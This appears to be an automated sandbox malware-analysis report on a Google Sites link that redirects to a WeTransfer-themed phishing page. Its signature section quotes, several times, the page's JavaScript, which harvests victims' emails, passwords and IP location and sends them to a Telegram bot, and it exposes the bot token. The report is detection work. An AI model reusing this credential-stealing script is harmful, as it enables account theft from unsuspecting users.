Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://sites.google.com/view/mangotamp/accueil?authuser=1

Overview

General Information

Sample URL:https://sites.google.com/view/mangotamp/accueil?authuser=1
Analysis ID:1608167
Infos:

Detection

Score:60
Range:0 - 100
Confidence:100%

Signatures

AI detected phishing page
AI detected suspicious Javascript
Javascript uses Telegram API
Uses the Telegram API (likely for C&C communication)
HTML body contains low number of good links
HTML body contains password input but no form action
HTML page contains hidden javascript code
HTML page contains string obfuscation
HTML title does not match URL
Javascript checks online IP of machine
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 6948 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 7132 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 --field-trial-handle=1796,i,9569064691295653764,3415312217548044914,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 4508 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://sites.google.com/view/mangotamp/accueil?authuser=1" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

Phishing

barindex
Source: https://gaqdo-poo-1056315.ingress-alpha.ewp.live/wp-content/gaqdo/log.htmlJoe Sandbox AI: Score: 9 Reasons: The brand 'WeTransfer' is well-known and typically associated with the domain 'wetransfer.com'., The URL 'gaqdo-poo-1056315.ingress-alpha.ewp.live' does not match the legitimate domain of WeTransfer., The URL contains multiple hyphens and subdomains, which is a common tactic used in phishing URLs to confuse users., The domain extension '.live' is unusual for a well-known brand like WeTransfer, which typically uses '.com'., The presence of input fields for 'E-mail' and 'Mot de passe' (password) is suspicious, especially when combined with an unrecognized domain. DOM: 5.6.pages.csv
Source: https://gaqdo-poo-1056315.ingress-alpha.ewp.live/wp-content/gaqdo/log-error.htmlJoe Sandbox AI: Score: 9 Reasons: The brand 'WeTransfer' is well-known and typically associated with the domain 'wetransfer.com'., The URL 'gaqdo-poo-1056315.ingress-alpha.ewp.live' does not match the legitimate domain of WeTransfer., The URL contains multiple hyphens and subdomains, which is a common tactic used in phishing URLs to confuse users., The domain extension '.live' is unusual for a well-known brand like WeTransfer, which typically uses '.com'., The presence of input fields for 'E-mail' and 'Mot de passe' (password) is suspicious, especially when combined with the non-matching domain. DOM: 6.7.pages.csv
Source: 5.34..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://gaqdo-poo-1056315.ingress-alpha.ewp.live/w... This script demonstrates several high-risk behaviors, including data exfiltration, dynamic code execution, and the use of obfuscated URLs. The script collects sensitive user information (email and password) and sends it to a Telegram bot, which could be used for malicious purposes. Additionally, the script fetches the user's IP address and location details, further compromising the user's privacy. While the script may have a legitimate purpose, the way it handles and transmits sensitive data poses a significant security risk.
Source: https://gaqdo-poo-1056315.ingress-alpha.ewp.live/wp-content/gaqdo/b.jsHTTP Parser: const telegrambottoken = '7785321630:aago7kxu-0bovs4i4gnl4a4bxprqbeetwje'; // replace with your bot tokenconst chatid = '-4782781777'; // replace with your chat idconst redirecturl = './log-error.html'; // replace with the url you want to redirect to// function to send data to telegram botfunction sendmessagetotelegram(message) { const url = `https://api.telegram.org/bot${telegrambottoken}/sendmessage`; // prepare data to be sent in the post request const data = { chat_id: chatid, text: message }; // send post request to telegram api fetch(url, { method: 'post', headers: { 'content-type': 'application/json' }, body: json.stringify(data) }) .then(response => response.json()) .then(data => { if (data.ok) { // redirect to another page after successful submission window.location.href = redirecturl; } else { alert('error: ' + data.description); } }) .catch((error) => { console.error('error:', error); alert('error sendi...
Source: https://gaqdo-poo-1056315.ingress-alpha.ewp.live/wp-content/gaqdo/a.jsHTTP Parser: const telegrambottoken = '7785321630:aago7kxu-0bovs4i4gnl4a4bxprqbeetwje'; // replace with your bot tokenconst chatid = '-4782781777'; // replace with your chat idconst redirecturl = './log-error.html'; // replace with the url you want to redirect to// function to send data to telegram botfunction sendmessagetotelegram(message) { const url = `https://api.telegram.org/bot${telegrambottoken}/sendmessage`; // prepare data to be sent in the post request const data = { chat_id: chatid, text: message }; // send post request to telegram api fetch(url, { method: 'post', headers: { 'content-type': 'application/json' }, body: json.stringify(data) }) .then(response => response.json()) .then(data => { if (data.ok) { // redirect to another page after successful submission window.location.href = redirecturl; } else { alert('error: ' + data.description); } }) .catch((error) => { console.error('error:', error); alert('error sendi...
Source: https://gaqdo-poo-1056315.ingress-alpha.ewp.live/wp-content/gaqdo/log.htmlHTTP Parser: Number of links: 0
Source: https://gaqdo-poo-1056315.ingress-alpha.ewp.live/wp-content/gaqdo/log-error.htmlHTTP Parser: Number of links: 0
Source: https://gaqdo-poo-1056315.ingress-alpha.ewp.live/wp-content/gaqdo/log.htmlHTTP Parser: <input type="password" .../> found but no <form action="...
Source: https://gaqdo-poo-1056315.ingress-alpha.ewp.live/wp-content/gaqdo/log-error.htmlHTTP Parser: <input type="password" .../> found but no <form action="...
Source: https://gaqdo-poo-1056315.ingress-alpha.ewp.live/wp-content/gaqdo/log.htmlHTTP Parser: Base64 decoded: <?xml version="1.0" encoding="UTF-8" standalone="no"?><svg width="72px" height="65px" viewBox="0 0 72 65" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:sketch="http://www.bohemiancoding.com/sketch/ns">...
Source: https://gaqdo-poo-1056315.ingress-alpha.ewp.live/wp-content/gaqdo/b.jsHTTP Parser: Found new string: script const telegramBotToken = '7785321630:AAGo7KXU-0boVs4i4GnL4A4bxprqBEetwJE'; // Replace with your bot token.const chatId = '-4782781777'; // Replace with your chat ID.const redirectUrl = './log-error.html'; // Replace with the URL you want to redirect to..// Function to send data to Telegram bot.function sendMessageToTelegram(message) {. const url = `https://api.telegram.org/bot${telegramBotToken}/sendMessage`;.. // Prepare data to be sent in the POST request. const data = {. chat_id: chatId,. text: message. };.. // Send POST request to Telegram API. fetch(url, {. method: 'POST',. headers: {. 'Content-Type': 'application/json'. },. body: JSON.stringify(data). }). .then(response => response.json()). .then(data => {. if (data.ok) {. // Redirect to another page after successful submission. window.location.href = redirectUrl;. } else {. alert('Error: ' + data.description);. }. }). .catch((error) => {. console.error('Error:', error);. alert('Error sendi...
Source: https://gaqdo-poo-1056315.ingress-alpha.ewp.live/wp-content/gaqdo/a.jsHTTP Parser: Found new string: script const telegramBotToken = '7785321630:AAGo7KXU-0boVs4i4GnL4A4bxprqBEetwJE'; // Replace with your bot token.const chatId = '-4782781777'; // Replace with your chat ID.const redirectUrl = './log-error.html'; // Replace with the URL you want to redirect to..// Function to send data to Telegram bot.function sendMessageToTelegram(message) {. const url = `https://api.telegram.org/bot${telegramBotToken}/sendMessage`;.. // Prepare data to be sent in the POST request. const data = {. chat_id: chatId,. text: message. };.. // Send POST request to Telegram API. fetch(url, {. method: 'POST',. headers: {. 'Content-Type': 'application/json'. },. body: JSON.stringify(data). }). .then(response => response.json()). .then(data => {. if (data.ok) {. // Redirect to another page after successful submission. window.location.href = redirectUrl;. } else {. alert('Error: ' + data.description);. }. }). .catch((error) => {. console.error('Error:', error);. alert('Error sendi...
Source: https://gaqdo-poo-1056315.ingress-alpha.ewp.live/wp-content/gaqdo/log.htmlHTTP Parser: Title: WeTransfer account | WeTransfer does not match URL
Source: https://gaqdo-poo-1056315.ingress-alpha.ewp.live/wp-content/gaqdo/log-error.htmlHTTP Parser: Title: WeTransfer account | WeTransfer does not match URL
Source: https://gaqdo-poo-1056315.ingress-alpha.ewp.live/wp-content/gaqdo/b.jsHTTP Parser: const telegrambottoken = '7785321630:aago7kxu-0bovs4i4gnl4a4bxprqbeetwje'; // replace with your bot tokenconst chatid = '-4782781777'; // replace with your chat idconst redirecturl = './log-error.html'; // replace with the url you want to redirect to// function to send data to telegram botfunction sendmessagetotelegram(message) { const url = `https://api.telegram.org/bot${telegrambottoken}/sendmessage`; // prepare data to be sent in the post request const data = { chat_id: chatid, text: message }; // send post request to telegram api fetch(url, { method: 'post', headers: { 'content-type': 'application/json' }, body: json.stringify(data) }) .then(response => response.json()) .then(data => { if (data.ok) { // redirect to another page after successful submission window.location.href = redirecturl; } else { alert('error: ' + data.description); } }) .catch((error) => { console.error('error:', error); alert('error sendi...
Source: https://gaqdo-poo-1056315.ingress-alpha.ewp.live/wp-content/gaqdo/a.jsHTTP Parser: const telegrambottoken = '7785321630:aago7kxu-0bovs4i4gnl4a4bxprqbeetwje'; // replace with your bot tokenconst chatid = '-4782781777'; // replace with your chat idconst redirecturl = './log-error.html'; // replace with the url you want to redirect to// function to send data to telegram botfunction sendmessagetotelegram(message) { const url = `https://api.telegram.org/bot${telegrambottoken}/sendmessage`; // prepare data to be sent in the post request const data = { chat_id: chatid, text: message }; // send post request to telegram api fetch(url, { method: 'post', headers: { 'content-type': 'application/json' }, body: json.stringify(data) }) .then(response => response.json()) .then(data => { if (data.ok) { // redirect to another page after successful submission window.location.href = redirecturl; } else { alert('error: ' + data.description); } }) .catch((error) => { console.error('error:', error); alert('error sendi...
Source: https://gaqdo-poo-1056315.ingress-alpha.ewp.live/wp-content/gaqdo/log.htmlHTTP Parser: <input type="password" .../> found
Source: https://gaqdo-poo-1056315.ingress-alpha.ewp.live/wp-content/gaqdo/log-error.htmlHTTP Parser: <input type="password" .../> found
Source: https://gaqdo-poo-1056315.ingress-alpha.ewp.live/wp-content/gaqdo/HTTP Parser: No favicon
Source: https://gaqdo-poo-1056315.ingress-alpha.ewp.live/wp-content/gaqdo/log.htmlHTTP Parser: No <meta name="author".. found
Source: https://gaqdo-poo-1056315.ingress-alpha.ewp.live/wp-content/gaqdo/log-error.htmlHTTP Parser: No <meta name="author".. found
Source: https://gaqdo-poo-1056315.ingress-alpha.ewp.live/wp-content/gaqdo/log.htmlHTTP Parser: No <meta name="copyright".. found
Source: https://gaqdo-poo-1056315.ingress-alpha.ewp.live/wp-content/gaqdo/log-error.htmlHTTP Parser: No <meta name="copyright".. found
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49756 version: TLS 1.2
Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.16:49758 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49760 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49845 version: TLS 1.2
Source: chrome.exeMemory has grown: Private usage: 9MB later: 27MB

Networking

barindex
Source: unknownDNS query: name: api.telegram.org
Source: unknownDNS query: name: api.telegram.org
Source: unknownDNS query: name: api.telegram.org
Source: unknownDNS query: name: api.telegram.org
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.77.188
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: apis.google.com
Source: global trafficDNS traffic detected: DNS query: lh4.googleusercontent.com
Source: global trafficDNS traffic detected: DNS query: lh3.googleusercontent.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: play.google.com
Source: global trafficDNS traffic detected: DNS query: hm.ru
Source: global trafficDNS traffic detected: DNS query: mc.yandex.ru
Source: global trafficDNS traffic detected: DNS query: api.hm.ru
Source: global trafficDNS traffic detected: DNS query: gaqdo-poo-1056315.ingress-alpha.ewp.live
Source: global trafficDNS traffic detected: DNS query: mc.yandex.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: auth-cdn.wetransfer.com
Source: global trafficDNS traffic detected: DNS query: ipapi.co
Source: global trafficDNS traffic detected: DNS query: api.telegram.org
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49756 version: TLS 1.2
Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.16:49758 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49760 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49845 version: TLS 1.2
Source: classification engineClassification label: mal60.phis.troj.win@20/68@50/376
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 --field-trial-handle=1796,i,9569064691295653764,3415312217548044914,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://sites.google.com/view/mangotamp/accueil?authuser=1"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 --field-trial-handle=1796,i,9569064691295653764,3415312217548044914,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
